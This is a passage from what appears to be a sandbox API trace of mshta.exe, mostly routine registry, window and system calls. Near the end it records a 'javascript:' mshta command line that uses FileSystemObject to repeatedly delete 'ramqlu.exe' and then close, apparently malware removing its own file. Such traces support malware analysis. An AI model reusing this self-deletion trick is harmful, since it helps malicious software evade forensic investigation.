samDesired=0x1, phkResult=0x2cf31c | out: phkResult=0x2cf31c*=0x94) returned 0x0 [0065.105] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.105] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.105] RegCloseKey (hKey=0x0) returned 0x6 [0065.105] RegCloseKey (hKey=0x0) returned 0x6 [0065.105] RegCloseKey (hKey=0x98) returned 0x0 [0065.105] RegCloseKey (hKey=0x94) returned 0x0 [0065.105] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf318 | out: phkResult=0x2cf318*=0x94) returned 0x0 [0065.105] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf31c | out: phkResult=0x2cf31c*=0x98) returned 0x0 [0065.106] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ARIA_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.106] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_ARIA_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.106] RegCloseKey (hKey=0x0) returned 0x6 [0065.106] RegCloseKey (hKey=0x0) returned 0x6 [0065.106] RegCloseKey (hKey=0x94) returned 0x0 [0065.106] RegCloseKey (hKey=0x98) returned 0x0 [0065.106] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf318 | out: phkResult=0x2cf318*=0x98) returned 0x0 [0065.106] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", 
ulOptions=0x0, samDesired=0x1, phkResult=0x2cf31c | out: phkResult=0x2cf31c*=0x94) returned 0x0 [0065.106] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_LEGACY_DISPPARAMS", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.106] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_LEGACY_DISPPARAMS", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x9c) returned 0x0 [0065.107] SHRegGetValueW () returned 0x2 [0065.107] SHRegGetValueW () returned 0x2 [0065.107] RegCloseKey (hKey=0x9c) returned 0x0 [0065.107] RegCloseKey (hKey=0x0) returned 0x6 [0065.107] RegCloseKey (hKey=0x0) returned 0x6 [0065.107] RegCloseKey (hKey=0x98) returned 0x0 [0065.107] RegCloseKey (hKey=0x94) returned 0x0 [0065.107] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf318 | out: phkResult=0x2cf318*=0x94) returned 0x0 [0065.107] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf31c | out: phkResult=0x2cf31c*=0x98) returned 0x0 [0065.107] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_PRIVATE_FONT_SETTING", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.107] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_PRIVATE_FONT_SETTING", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.107] RegCloseKey (hKey=0x0) returned 0x6 [0065.107] RegCloseKey (hKey=0x0) returned 0x6 [0065.107] RegCloseKey (hKey=0x94) returned 0x0 [0065.108] RegCloseKey (hKey=0x98) returned 0x0 [0065.108] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf318 | out: phkResult=0x2cf318*=0x98) returned 0x0 [0065.108] RegOpenKeyExW (in: 
hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf31c | out: phkResult=0x2cf31c*=0x94) returned 0x0 [0065.108] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_CSS_SHOW_HIDE_EVENTS", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.108] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_CSS_SHOW_HIDE_EVENTS", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.108] RegCloseKey (hKey=0x0) returned 0x6 [0065.108] RegCloseKey (hKey=0x0) returned 0x6 [0065.108] RegCloseKey (hKey=0x98) returned 0x0 [0065.108] RegCloseKey (hKey=0x94) returned 0x0 [0065.108] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf318 | out: phkResult=0x2cf318*=0x94) returned 0x0 [0065.109] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf31c | out: phkResult=0x2cf31c*=0x98) returned 0x0 [0065.109] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_DISPLAY_NODE_ADVISE_KB833311", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.109] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_DISPLAY_NODE_ADVISE_KB833311", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.109] RegCloseKey (hKey=0x0) returned 0x6 [0065.109] RegCloseKey (hKey=0x0) returned 0x6 [0065.109] RegCloseKey (hKey=0x94) returned 0x0 [0065.109] RegCloseKey (hKey=0x98) returned 0x0 [0065.109] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf318 | out: phkResult=0x2cf318*=0x98) returned 0x0 [0065.109] RegOpenKeyExW (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf31c | out: phkResult=0x2cf31c*=0x94) returned 0x0 [0065.109] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_ALLOW_EXPANDURI_BYPASS", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.109] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ALLOW_EXPANDURI_BYPASS", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.110] RegCloseKey (hKey=0x0) returned 0x6 [0065.110] RegCloseKey (hKey=0x0) returned 0x6 [0065.110] RegCloseKey (hKey=0x98) returned 0x0 [0065.110] RegCloseKey (hKey=0x94) returned 0x0 [0065.110] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf318 | out: phkResult=0x2cf318*=0x94) returned 0x0 [0065.110] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf31c | out: phkResult=0x2cf31c*=0x98) returned 0x0 [0065.110] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.110] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.110] RegCloseKey (hKey=0x0) returned 0x6 [0065.110] RegCloseKey (hKey=0x0) returned 0x6 [0065.110] RegCloseKey (hKey=0x94) returned 0x0 [0065.110] RegCloseKey (hKey=0x98) returned 0x0 [0065.111] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf318 | out: phkResult=0x2cf318*=0x98) returned 0x0 [0065.111] RegOpenKeyExW (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf31c | out: phkResult=0x2cf31c*=0x94) returned 0x0 [0065.111] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_DATABINDING_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.111] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_DATABINDING_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.111] RegCloseKey (hKey=0x0) returned 0x6 [0065.111] RegCloseKey (hKey=0x0) returned 0x6 [0065.111] RegCloseKey (hKey=0x98) returned 0x0 [0065.111] RegCloseKey (hKey=0x94) returned 0x0 [0065.111] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf318 | out: phkResult=0x2cf318*=0x94) returned 0x0 [0065.111] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf31c | out: phkResult=0x2cf31c*=0x98) returned 0x0 [0065.112] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ENFORCE_BSTR", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.112] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_ENFORCE_BSTR", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.112] RegCloseKey (hKey=0x0) returned 0x6 [0065.112] RegCloseKey (hKey=0x0) returned 0x6 [0065.112] RegCloseKey (hKey=0x94) returned 0x0 [0065.112] RegCloseKey (hKey=0x98) returned 0x0 [0065.112] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf318 | out: phkResult=0x2cf318*=0x98) returned 0x0 [0065.112] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet 
Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf31c | out: phkResult=0x2cf31c*=0x94) returned 0x0 [0065.112] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.112] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.112] RegCloseKey (hKey=0x0) returned 0x6 [0065.113] RegCloseKey (hKey=0x0) returned 0x6 [0065.113] RegCloseKey (hKey=0x98) returned 0x0 [0065.113] RegCloseKey (hKey=0x94) returned 0x0 [0065.113] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0065.114] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf318 | out: phkResult=0x2cf318*=0x98) returned 0x0 [0065.115] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf31c | out: phkResult=0x2cf31c*=0x9c) returned 0x0 [0065.115] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.115] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.115] RegCloseKey (hKey=0x0) returned 0x6 [0065.115] RegCloseKey (hKey=0x0) returned 0x6 [0065.115] RegCloseKey (hKey=0x98) returned 0x0 [0065.115] RegCloseKey (hKey=0x9c) returned 0x0 [0065.115] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf318 | out: phkResult=0x2cf318*=0x9c) returned 0x0 [0065.115] 
RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf31c | out: phkResult=0x2cf31c*=0x98) returned 0x0 [0065.115] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.116] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.116] RegCloseKey (hKey=0x0) returned 0x6 [0065.116] RegCloseKey (hKey=0x0) returned 0x6 [0065.116] RegCloseKey (hKey=0x9c) returned 0x0 [0065.116] RegCloseKey (hKey=0x98) returned 0x0 [0065.116] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf318 | out: phkResult=0x2cf318*=0x98) returned 0x0 [0065.116] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf31c | out: phkResult=0x2cf31c*=0x9c) returned 0x0 [0065.116] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.116] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2d8 | out: phkResult=0x2cf2d8*=0x0) returned 0x2 [0065.116] RegCloseKey (hKey=0x0) returned 0x6 [0065.116] RegCloseKey (hKey=0x0) returned 0x6 [0065.116] RegCloseKey (hKey=0x98) returned 0x0 [0065.117] RegCloseKey (hKey=0x9c) returned 0x0 [0065.117] GetSystemMetrics (nIndex=68) returned 4 [0065.117] GetSystemMetrics (nIndex=69) returned 4 [0065.117] GetProfileIntA (lpAppName="windows", lpKeyName="DragDelay", nDefault=20) returned 0x14 
[0065.117] GetSystemDefaultLCID () returned 0x409 [0065.118] GetVersionExW (in: lpVersionInformation=0x2cf27c*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x77c6e36c, dwMinorVersion=0x77c6e0d2, dwBuildNumber=0x7502afd8, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x2cf27c*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0065.118] GetUserDefaultUILanguage () returned 0x409 [0065.118] GetLocaleInfoW (in: Locale=0x409, LCType=0x58, lpLCData=0x2cf1cc, cchData=16 | out: lpLCData="\x03") returned 16 [0065.217] GetKeyboardLayoutList (in: nBuff=32, lpList=0x2cf1fc | out: lpList=0x2cf1fc) returned 1 [0065.217] GetSystemMetrics (nIndex=4096) returned 0 [0065.218] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf320 | out: phkResult=0x2cf320*=0x9c) returned 0x0 [0065.218] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf324 | out: phkResult=0x2cf324*=0x98) returned 0x0 [0065.218] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_CLEANUP_AT_FLS", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2e0 | out: phkResult=0x2cf2e0*=0x0) returned 0x2 [0065.218] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_CLEANUP_AT_FLS", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf2e0 | out: phkResult=0x2cf2e0*=0x0) returned 0x2 [0065.218] RegCloseKey (hKey=0x0) returned 0x6 [0065.218] RegCloseKey (hKey=0x0) returned 0x6 [0065.218] RegCloseKey (hKey=0x9c) returned 0x0 [0065.218] RegCloseKey (hKey=0x98) returned 0x0 [0065.218] GetModuleFileNameW (in: hModule=0x74af0000, lpFilename=0x2cf188, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshtml.dll" (normalized: "c:\\windows\\syswow64\\mshtml.dll")) returned 0x1e [0065.218] RtlAllocateHeap (HeapHandle=0x410000, 
Flags=0x0, Size=0x3e) returned 0x423de0 [0065.219] RegisterClipboardFormatA (lpszFormat="Embedded Object") returned 0xc00a [0065.219] RegisterClipboardFormatA (lpszFormat="Embed Source") returned 0xc00b [0065.219] RegisterClipboardFormatA (lpszFormat="Link Source") returned 0xc00d [0065.219] RegisterClipboardFormatA (lpszFormat="Link Source Descriptor") returned 0xc00f [0065.219] RegisterClipboardFormatA (lpszFormat="Object Descriptor") returned 0xc00e [0065.219] RegisterClipboardFormatA (lpszFormat="MS Forms CLSID") returned 0xc16c [0065.219] RegisterClipboardFormatA (lpszFormat="MS Forms Text") returned 0xc16d [0065.219] GetDC (hWnd=0x0) returned 0x100109eb [0065.219] SHCreateShellPalette (hdc=0x0) returned 0xe080283 [0065.219] GetPaletteEntries (in: hpal=0xe080283, iStart=0x0, cEntries=0x100, pPalEntries=0x7502a494 | out: pPalEntries=0x7502a494) returned 0x100 [0065.219] SHGetInverseCMAP (in: pbMap=0x75028a7c, cbMap=0x4 | out: pbMap=0x75028a7c) returned 0x0 [0065.219] GetDeviceCaps (hdc=0x100109eb, index=38) returned 32409 [0065.219] ReleaseDC (hWnd=0x0, hDC=0x100109eb) returned 1 [0065.219] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20a) returned 0x42ea78 [0065.220] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x2000) returned 0x42f490 [0065.220] GetCurrentProcessId () returned 0x358 [0065.220] _vsnprintf (in: _DstBuf=0x2cf6cc, _MaxCount=0x16, _Format="%s%08lX", _ArgList=0x2cf394 | out: _DstBuf="#MSHTML#PERF#00000358") returned 21 [0065.220] OpenFileMappingA (dwDesiredAccess=0x2, bInheritHandle=0, lpName="#MSHTML#PERF#00000358") returned 0x0 [0065.220] GetVersionExW (in: lpVersionInformation=0x2cf3b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x4136d0, dwMinorVersion=0x100, dwBuildNumber=0x42dc78, dwPlatformId=0x410000, szCSDVersion="A") | out: lpVersionInformation=0x2cf3b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0065.221] 
GetModuleHandleW (lpModuleName="advapi32") returned 0x77710000 [0065.221] GetProcAddress (hModule=0x77710000, lpProcName="EventWrite") returned 0x77ca0c59 [0065.221] GetProcAddress (hModule=0x77710000, lpProcName="EventRegister") returned 0x77c7f6ba [0065.221] GetProcAddress (hModule=0x77710000, lpProcName="EventUnregister") returned 0x77c99241 [0065.221] EtwEventRegister () returned 0x0 [0065.221] EtwRegisterTraceGuidsW () returned 0x0 [0065.221] EtwRegisterTraceGuidsW () returned 0x0 [0065.221] EtwEventRegister () returned 0x0 [0065.222] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Program Files\\Microsoft Office\\Office14\\outllib.dll", lpdwHandle=0x2cf17c | out: lpdwHandle=0x2cf17c) returned 0x0 [0065.222] GetModuleHandleW (lpModuleName=0x0) returned 0x970000 [0065.222] GetModuleFileNameW (in: hModule=0x970000, lpFilename=0x2cf188, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0065.222] PathFindFileNameW (pszPath="C:\\Windows\\SysWOW64\\mshta.exe") returned="mshta.exe" [0065.224] GetCurrentProcessId () returned 0x358 [0065.224] GetCurrentProcessId () returned 0x358 [0065.227] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Local\\!PrivacIE!SharedMemory!Mutex") returned 0xbc [0065.227] GetLastError () returned 0xb7 [0065.227] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10, lpName="Local\\!PrivacIE!SharedMem!Counter") returned 0xc0 [0065.227] MapViewOfFile (hFileMappingObject=0xc0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xa0000 [0065.296] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x761e88 | out: hHeap=0x760000) returned 1 [0065.296] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x760e78 | out: hHeap=0x760000) returned 1 [0065.296] RegCloseKey (hKey=0x42) returned 0x0 [0065.296] GetModuleHandleW 
(lpModuleName="kernel32.dll") returned 0x76d30000 [0065.296] GetProcAddress (hModule=0x76d30000, lpProcName="RegisterApplicationRestart") returned 0x76d6b53c [0065.297] lstrlenA (lpString="\"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);\"") returned 141 [0065.297] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x11c) returned 0x761e88 [0065.297] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x412b42, cbMultiByte=-1, lpWideCharStr=0x761e88, cchWideChar=142 | out: lpWideCharStr="\"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);\"") returned 142 [0065.297] RegisterApplicationRestart (pwzCommandline="\"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);\"", dwFlags=0x0) returned 0x0 [0065.297] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x761e88 | out: hHeap=0x760000) returned 1 [0065.297] GetProcAddress (hModule=0x74af0000, lpProcName="RunHTMLApplication") returned 0x74b4e710 [0065.297] GetCommandLineW () returned="mshta.exe \"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);\"" [0065.298] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x120) returned 0x435358 [0065.298] OleInitialize (pvReserved=0x0) returned 0x0 [0065.640] IsWindow (hWnd=0x0) returned 0 [0065.640] RegisterClassW (lpWndClass=0x2cfa34) returned 0xc059 [0065.640] CreateWindowExW (dwExStyle=0x0, lpClassName="HTML Application Host Window Class", lpWindowName="", dwStyle=0x0, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x970000, lpParam=0x75029680) returned 0x4015e [0065.641] NtdllDefWindowProc_W () returned 0x0 [0065.641] NtdllDefWindowProc_W () returned 0x1 [0065.642] 
NtdllDefWindowProc_W () returned 0x0 [0065.644] NtdllDefWindowProc_W () returned 0x0 [0065.644] CreateWindowExW (dwExStyle=0x40000, lpClassName="HTML Application Host Window Class", lpWindowName="", dwStyle=0x2cf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x4015e, hMenu=0x0, hInstance=0x970000, lpParam=0x75029680) returned 0x3017c [0065.644] NtdllDefWindowProc_W () returned 0x0 [0065.644] NtdllDefWindowProc_W () returned 0x1 [0065.644] NtdllDefWindowProc_W () returned 0x0 [0065.645] NtdllDefWindowProc_W () returned 0x0 [0065.645] SetWindowLongW (hWnd=0x3017c, nIndex=-16, dwNewLong=-2100363264) returned 114229248 [0065.645] NtdllDefWindowProc_W () returned 0x0 [0065.645] NtdllDefWindowProc_W () returned 0x0 [0065.646] NtdllDefWindowProc_W () returned 0x0 [0065.646] NtdllDefWindowProc_W () returned 0x0 [0065.646] NtdllDefWindowProc_W () returned 0x0 [0065.646] NtdllDefWindowProc_W () returned 0x0 [0065.646] SetWindowPos (hWnd=0x3017c, hWndInsertAfter=0xfffffffe, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0065.646] NtdllDefWindowProc_W () returned 0x0 [0065.646] NtdllDefWindowProc_W () returned 0x0 [0065.647] NtdllDefWindowProc_W () returned 0x0 [0065.647] NtdllDefWindowProc_W () returned 0x0 [0065.648] NtdllDefWindowProc_W () returned 0x0 [0065.648] SendMessageW (hWnd=0x3017c, Msg=0x127, wParam=0x3, lParam=0x0) returned 0x0 [0065.648] NtdllDefWindowProc_W () returned 0x0 [0065.648] NtdllDefWindowProc_W () returned 0x0 [0065.649] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x120) returned 0x43b440 [0065.649] PathRemoveArgsW (in: pszPath="\"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);\"" | out: pszPath="\"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);\"") [0065.649] PathRemoveBlanksW (in: pszPath="\"javascript:o=new 
ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);\"" | out: pszPath="\"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);\"") [0065.649] PathUnquoteSpacesW (in: lpsz="\"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);\"" | out: lpsz="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);") returned 1 [0065.649] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", ppmk=0x2cfa94*=0x0, dwFlags=0x1 | out: ppmk=0x2cfa94*=0x4206a8) returned 0x0 [0065.668] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43b440 | out: hHeap=0x410000) returned 1 [0065.668] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x43f818 [0065.669] CoCreateInstance (in: rclsid=0x74c29770*(Data1=0x3050f5c8, 